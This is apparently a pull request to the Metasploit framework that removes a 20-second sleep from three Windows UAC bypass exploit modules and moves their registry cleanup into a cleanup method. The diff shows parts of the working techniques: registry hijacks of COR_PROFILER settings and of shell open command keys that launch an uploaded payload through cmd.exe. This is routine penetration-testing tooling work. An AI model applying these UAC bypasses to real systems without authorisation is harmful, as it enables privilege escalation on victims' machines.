### PR TITLE
Remove unnecesary sleep in several bypassuac modules

### DIFF
--- a/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb
+++ b/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb
@@ -179,12 +179,12 @@ class MetasploitModule < Msf::Exploit::Local
     rescue Rex::Post::Meterpreter::RequestError => e
       print_error(e.to_s)
     end
-    print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")
+    print_warning("This exploit requires manual cleanup of '#{payload_pathname}'")
     print_status("Please wait for session and cleanup....")
   end
 
   def cleanup
-    unless @reg_keys.empty?
+    if @reg_keys.present?
       vprint_status("Removing Registry Changes")
       @reg_keys.each do |key_hash|
         remove_reg_value(key_hash)

--- a/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb
+++ b/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb
@@ -105,6 +105,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
+    @reg_keys = []
     check_permissions!
     case get_uac_level
     when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
@@ -140,31 +141,30 @@ class MetasploitModule < Msf::Exploit::Local
 
     uuid = SecureRandom.uuid
     vprint_status("UUID = #{uuid}")
-    reg_keys = []
     # This reg key will not hurt anything in windows 10+, but is not required.
     unless sysinfo['OS'] =~ /Windows (2016|10)/
-      reg_keys.push(key_name: "HKCU\\Software\\Classes\\CLSID\\{#{uuid}}\\InprocServer32",
+      @reg_keys.push(key_name: "HKCU\\Software\\Classes\\CLSID\\{#{uuid}}\\InprocServer32",
                     value_name: '',
                     value_type: "REG_EXPAND_SZ",
                     value_value: payload_pathname,
                     delete_on_cleanup: false)
     end
-    reg_keys.push(key_name: "HKCU\\Environment",
+    @reg_keys.push(key_name: "HKCU\\Environment",
                   value_name: "COR_PROFILER",
                   value_type: "REG_SZ",
                   value_value: "{#{uuid}}",
                   delete_on_cleanup: false)
-    reg_keys.push(key_name: "HKCU\\Environment",
+    @reg_keys.push(key_name: "HKCU\\Environment",
                   value_name: "COR_ENABLE_PROFILING",
                   value_type: "REG_SZ",
                   value_value: "1",
                   delete_on_cleanup: false)
-    reg_keys.push(key_name: "HKCU\\Environment",
+    @reg_keys.push(key_name: "HKCU\\Environment",
                   value_name: "COR_PROFILER_PATH",
                   value_type: "REG_SZ",
                   value_value: payload_pathname,
                   delete_on_cleanup: false)
-    reg_keys.each do |key_hash|
+    @reg_keys.each do |key_hash|
       write_reg_value(key_hash)
     end
 
@@ -180,14 +180,17 @@ class MetasploitModule < Msf::Exploit::Local
       print_error(e.to_s)
     end
     print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")
-    # wait for a few seconds before cleaning up
     print_status("Please wait for session and cleanup....")
-    sleep(20)
-    vprint_status("Removing Registry Changes")
-    reg_keys.each do |key_hash|
-      remove_reg_value(key_hash)
+  end
+
+  def cleanup
+    unless @reg_keys.empty?
+      vprint_status("Removing Registry Changes")
+      @reg_keys.each do |key_hash|
+        remove_reg_value(key_hash)
+      end
+      vprint_status("Registry Changes Removed")
     end
-    vprint_status("Registry Changes Removed")
   end
 
   def check_permissions!

--- a/modules/exploits/windows/local/bypassuac_sdclt.rb
+++ b/modules/exploits/windows/local/bypassuac_sdclt.rb
@@ -79,6 +79,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
+    @registry_key = ''
+    @remove_registry_key = false
     check_permissions!
     case get_uac_level
     when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
@@ -95,8 +97,8 @@ class MetasploitModule < Msf::Exploit::Local
       return
     end
 
-    registry_key = 'HKCU\Software\Classes\Folder\shell\open\command'
-    remove_registry_key = !registry_key_exist?(registry_key)
+    @registry_key = 'HKCU\Software\Classes\Folder\shell\open\command'
+    @remove_registry_key = !registry_key_exist?(@registry_key)
 
     # get directory locations straight
     win_dir = session.sys.config.getenv('windir')
@@ -116,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Local
     payload = generate_payload_exe
     reg_command = exploit_dir + "cmd.exe /c start #{payload_pathname}"
     vprint_status("reg_command = " + reg_command)
-    write_reg_values(registry_key, reg_command)
+    write_reg_values(@registry_key, reg_command)
 
     # Upload payload
     vprint_status("Uploading Payload to #{payload_pathname}")
@@ -130,17 +132,20 @@ class MetasploitModule < Msf::Exploit::Local
       print_error("Executing command failed:\n#{e}")
     end
     print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")
-    # wait for a few seconds before cleaning up
     print_status("Please wait for session and cleanup....")
-    sleep(20)
-    vprint_status("Removing Registry Changes")
-    if remove_registry_key
-      registry_deletekey(registry_key)
-    else
-      registry_deleteval(registry_key, "DelegateExecute")
-      registry_deleteval(registry_key, '')
+  end
+
+  def cleanup
+    unless @registry_key.empty?
+      vprint_status("Removing Registry Changes")
+      if @remove_registry_key
+        registry_deletekey(@registry_key)
+      else
+        registry_deleteval(@registry_key, "DelegateExecute")
+        registry_deleteval(@registry_key, '')
+      end
+      print_status("Registry Changes Removed")
     end
-    print_status("Registry Changes Removed")
   end
 
   def check_permissions!

--- a/modules/exploits/windows/local/bypassuac_sdclt.rb
+++ b/modules/exploits/windows/local/bypassuac_sdclt.rb
@@ -131,12 +131,12 @@ class MetasploitModule < Msf::Exploit::Local
     rescue ::Exception => e
       print_error("Executing command failed:\n#{e}")
     end
-    print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")
+    print_warning("This exploit requires manual cleanup of '#{payload_pathname}'")
     print_status("Please wait for session and cleanup....")
   end
 
   def cleanup
-    unless @registry_key.empty?
+    if @registry_key.present?
       vprint_status("Removing Registry Changes")
       if @remove_registry_key
         registry_deletekey(@registry_key)

--- a/modules/exploits/windows/local/bypassuac_windows_store_reg.rb
+++ b/modules/exploits/windows/local/bypassuac_windows_store_reg.rb
@@ -69,6 +69,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
+    @registry_key = ''
     check_permissions!
     case get_uac_level
     when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
@@ -103,14 +104,14 @@ class MetasploitModule < Msf::Exploit::Local
     payload = generate_payload_exe
     reg_command = exploit_dir + "cmd.exe /c start #{payload_pathname}"
     vprint_status("reg_command = " + reg_command)
-    registry_key = "HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"
+    @registry_key = "HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"
 
     # make registry changes
     vprint_status("Making Registry Changes")
     begin
-      registry_createkey(registry_key)
-      registry_setvaldata(registry_key, "DelegateExecute", '', "REG_SZ")
-      registry_setvaldata(registry_key, '', reg_command, "REG_SZ")
+      registry_createkey(@registry_key)
+      registry_setvaldata(@registry_key, "DelegateExecute", '', "REG_SZ")
+      registry_setvaldata(@registry_key, '', reg_command, "REG_SZ")
     rescue ::Exception => e
       print_error(e.to_s)
     end
@@ -127,11 +128,14 @@ class MetasploitModule < Msf::Exploit::Local
       print_error(e.to_s)
     end
     print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")
-    # wait for a few seconds before cleaning up
-    sleep(20)
-    vprint_status("Removing Registry Changes")
-    registry_deletekey(registry_key)
-    vprint_status("Registry Changes Removed")
+  end
+
+  def cleanup
+    unless @registry_key.empty?
+      vprint_status("Removing Registry Changes")
+      registry_deletekey(@registry_key)
+      vprint_status("Registry Changes Removed")
+    end
   end
 
   def check_permissions!

--- a/modules/exploits/windows/local/bypassuac_windows_store_reg.rb
+++ b/modules/exploits/windows/local/bypassuac_windows_store_reg.rb
@@ -127,11 +127,11 @@ class MetasploitModule < Msf::Exploit::Local
     rescue ::Exception => e
       print_error(e.to_s)
     end
-    print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")
+    print_warning("This exploit requires manual cleanup of '#{payload_pathname}'")
   end
 
   def cleanup
-    unless @registry_key.empty?
+    if @registry_key.present?
       vprint_status("Removing Registry Changes")
       registry_deletekey(@registry_key)
       vprint_status("Registry Changes Removed")


### PR DESCRIPTION
This PR resolves a bug in several UAC bypass modules, which perform a sleep to await a shell before performing cleanup. The sleep is unnecessary, as the exploit driver already has the functionality to wait for a shell before performing cleanup.

The existing user experience feels frustrating ("what's it waiting for" or "Why hasn't it started my handler?"), which leads to a greater likelihood that the user will Ctrl+C out once the shell succeeds, preventing the cleanup and leaving more artifacts on disk.

Previous behaviour:

- For a reverse shell:
  - The exploit starts
  - The sleep starts
  - The exploit succeeds almost immediately, and we get a shell
  - We continue waiting for 20 seconds
  - The cleanup occurs
  - We enter our shell
- For a bind shell:
  - The exploit starts
  - The sleep starts
  - The exploit succeeds almost immediately, but we haven't started a handler yet
  - We continue waiting for 20 seconds
  - The cleanup occurs
  - The handler starts, and we gain a shell.
 
The new behaviour avoids the sleep, and leverages the existing `cleanup` method, so cleanup occurs as soon as we get the shell.

## Verification

- [ ] For each module:
- [ ] Set `verbose` to `true` (so you can see the cleanup)
- [ ] Test success with a reverse payload - should immediately cleanup and drop into the shell
- [ ] Test success with a bind payload - should immediately cleanup and drop into the shell
- [ ] Test failed exploit - should wait an appropriate amount of time, and cleanup
- [ ] Test invalid version - should terminate immediately, and cleanup should do nothing